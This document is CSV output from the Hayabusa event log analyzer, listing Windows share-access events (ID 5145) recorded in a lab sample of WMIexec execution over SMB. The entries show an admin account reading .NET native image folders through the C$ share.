2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
